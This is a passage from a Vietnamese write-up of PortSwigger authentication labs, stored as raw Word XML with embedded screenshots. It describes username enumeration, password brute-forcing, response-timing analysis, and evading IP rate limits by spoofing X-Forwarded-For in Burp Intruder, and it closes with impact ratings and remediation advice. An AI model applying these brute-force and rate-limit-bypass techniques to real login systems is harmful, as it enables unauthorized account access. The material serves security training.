        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51638DC0" wp14:editId="7341EAF2">
            <wp:extent cx="6115050" cy="5060315"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="455216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16913" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId213"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="5060315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB9E59B" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="004F0E8D" w:rsidRDefault="00F67FB2" w:rsidP="004F0E8D">
      <w:r w:rsidRPr="004F0E8D">
        <w:t>Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA3B09" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00C109D2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42DF2AD8" wp14:editId="067B6DB9">
            <wp:extent cx="6115050" cy="4925695"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1633912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12772" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId214"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4925695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A785EF" w14:textId="27C3020E" w:rsidR="00F67FB2" w:rsidRPr="00147BFE" w:rsidRDefault="004F0E8D" w:rsidP="00F67FB2">
      <w:r>
        <w:t xml:space="preserve">Bây giờ đã </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">có kết quả với username là </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00C109D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>alterwind</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00C109D2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>Tiếp tục</w:t>
      </w:r>
      <w:r w:rsidR="00BB4C3E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>thực hiện Brute-force password với username vừa tìm được là</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00C109D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> alterwind</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CA0E79" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00C109D2">
        <w:t>Chi tiết như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0399F9F9" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00C109D2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="482D1019" wp14:editId="03CF6A46">
            <wp:extent cx="6115050" cy="4906645"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="85610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0576" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId215"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4906645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="451779E8" w14:textId="5A05761F" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t xml:space="preserve">Và payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00147BFE">
        <w:t>(được cung cấp sẵn của yêu cầu</w:t>
      </w:r>
      <w:r w:rsidR="004F0E8D">
        <w:t xml:space="preserve"> bài lab</w:t>
      </w:r>
      <w:r w:rsidRPr="00147BFE">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AC98D1" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00C109D2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="472CB514" wp14:editId="192B9C35">
            <wp:extent cx="6115050" cy="6870065"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1364886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86582" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId216"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="6870065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="686F541A" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FA62E8" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00637EF5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39144BDC" wp14:editId="5AAF1003">
            <wp:extent cx="6115050" cy="5024120"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="392746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46536" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId217"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="5024120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB1229E" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Ta có password là:</w:t>
      </w:r>
      <w:r w:rsidRPr="00637EF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00637EF5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>baseball</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F89D40D" w14:textId="054BF6F2" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">hực hiện đăng nhập lại với </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>alterwind</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00C109D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">và </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>baseball</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0598C999" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00637EF5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09061BCF" wp14:editId="4A658A13">
            <wp:extent cx="6115050" cy="2164715"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1767368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68955" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId218"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2164715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="517AA203" w14:textId="3D5F9B05" w:rsidR="00F67FB2" w:rsidRPr="004F0E8D" w:rsidRDefault="00F67FB2" w:rsidP="004F0E8D">
      <w:r w:rsidRPr="004F0E8D">
        <w:t xml:space="preserve">Kết quả </w:t>
      </w:r>
      <w:r w:rsidR="00BB4C3E" w:rsidRPr="004F0E8D">
        <w:t xml:space="preserve">là </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E8D">
        <w:t>đã đăng nhập thành công và hoàn thành thử thách của bài lab này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A6261A" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00190E79" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00637EF5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="346EC562" wp14:editId="18970936">
            <wp:extent cx="6115050" cy="3158490"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="2033028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28636" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId219"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3158490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4910AB8E" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00190E79" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00190E79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00190E79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E8D">
        <w:t>High (cao) vì lỗ hổng này cho phép tấn công vét cạn username và password thông qua việc phân biệt thời gian phản hồi từ server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9246F2" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00315F42" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00190E79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidRPr="00190E79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E8D">
        <w:t>Cần chặn các request liên tục từ client lên server để ngăn chặn tấn công vét cạn username và password. Đồng thời, cần cải thiện cơ chế xác thực để giảm thiểu sự khác biệt trong thời gian phản hồi từ server khi sử dụng username và password sai hoặc đúng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457A97F2" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc182429528"/>
      <w:bookmarkStart w:id="87" w:name="_Toc182909889"/>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00B050BE">
        <w:t>08: Lab: Username enumeration via response timing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="73F16378" w14:textId="373035FB" w:rsidR="004F0E8D" w:rsidRDefault="004F0E8D" w:rsidP="00F67FB2">
      <w:hyperlink r:id="rId220" w:history="1">
        <w:r w:rsidRPr="005F5562">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-response-timing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B6FF3C9" w14:textId="4ACD8DC8" w:rsidR="00F67FB2" w:rsidRPr="008B273F" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B273F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A36146" w:rsidRPr="00A36146">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36146">
        <w:t>ỗ hổng liên quan đến việc tìm kiếm username và password thông qua thời gian phản hồi từ server sau khi thực hiện yêu cầu đăng nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E862C7" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B273F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E223067" w14:textId="7BB9DA5E" w:rsidR="00F67FB2" w:rsidRPr="004F0E8D" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F22D69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F0E8D">
        <w:t xml:space="preserve">Truy </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F22D69">
        <w:t>cập vào task và đăng nhập với tài khoản</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> sai</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00A41AB0">
        <w:t>, ví dụ là</w:t>
      </w:r>
      <w:r w:rsidR="004F0E8D">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>binh</w:t>
      </w:r>
      <w:r w:rsidR="004F0E8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F22D69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="004F0E8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>peter</w:t>
      </w:r>
      <w:r w:rsidR="004F0E8D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:t xml:space="preserve">. Cùng lúc đó </w:t>
      </w:r>
      <w:r w:rsidR="004F0E8D" w:rsidRPr="004F0E8D">
        <w:t xml:space="preserve">thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:t>bắt gói tin này lại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A7BD87" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00A41AB0" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A41AB0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75491077" wp14:editId="0F0999BF">
            <wp:extent cx="6115050" cy="2774950"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1561850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50529" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId221"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2774950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1EC346" w14:textId="30141F7F" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>huẩn bị và thực hiện tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D364F75" w14:textId="67C780C6" w:rsidR="00F67FB2" w:rsidRPr="004F0E8D" w:rsidRDefault="00BB4C3E" w:rsidP="004F0E8D">
      <w:r w:rsidRPr="004F0E8D">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:t xml:space="preserve">hực hiện gởi gói tin đến Repeater. Nếu </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E8D">
        <w:t xml:space="preserve">như </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:t xml:space="preserve">thực hiện đăng nhập với tài khoản không hợp lệ nhiều lần sẽ bị chặn IP. Vì vậy, để giải quyết vấn đề này, </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E8D">
        <w:t xml:space="preserve">cần </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:t xml:space="preserve">gởi thêm trường </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:t xml:space="preserve"> và thử một vài giá trị của trường X-Forwarded-For:500 (501, 502, 503, 504).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27934599" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="008E2D0A" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008E2D0A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E5BF93E" wp14:editId="2975BCF5">
            <wp:extent cx="5010150" cy="4494047"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1103242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42408" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId222"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5013547" cy="4497094"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E1CF6E" w14:textId="5098A2D8" w:rsidR="00F67FB2" w:rsidRPr="008E2D0A" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="008E2D0A">
        <w:t>Tiếp theo</w:t>
      </w:r>
      <w:r w:rsidR="00BB4C3E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2D0A">
        <w:t>chỉnh sửa lại gói tin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cho </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2D0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>đúng với tài khoản</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (với password dài) và </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2D0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>X-Forwarded-For:0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2D0A">
        <w:t xml:space="preserve">để thực hiện tấn công </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">brute-force với username </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2D0A">
        <w:t>như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDF886E" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008E2D0A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24DEB92E" wp14:editId="0F72D9B4">
            <wp:extent cx="5962956" cy="4800847"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="277008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08942" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId223"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5962956" cy="4800847"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="768192CA" w14:textId="1853B531" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00F17960">
        <w:t>Ở phần positions này</w:t>
      </w:r>
      <w:r w:rsidR="00BB4C3E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17960">
        <w:t>chọn loại tấn công là Pitch Fork</w:t>
      </w:r>
      <w:r>
        <w:t>. Tiếp theo đến với phần Payloads, thiết lập như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E93D60" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17960">
        <w:t xml:space="preserve">Tại </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17960">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>payload set: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E47E98" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00F17960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44168683" wp14:editId="2F332B4E">
            <wp:extent cx="5943905" cy="4711942"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1915089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89704" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId224"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
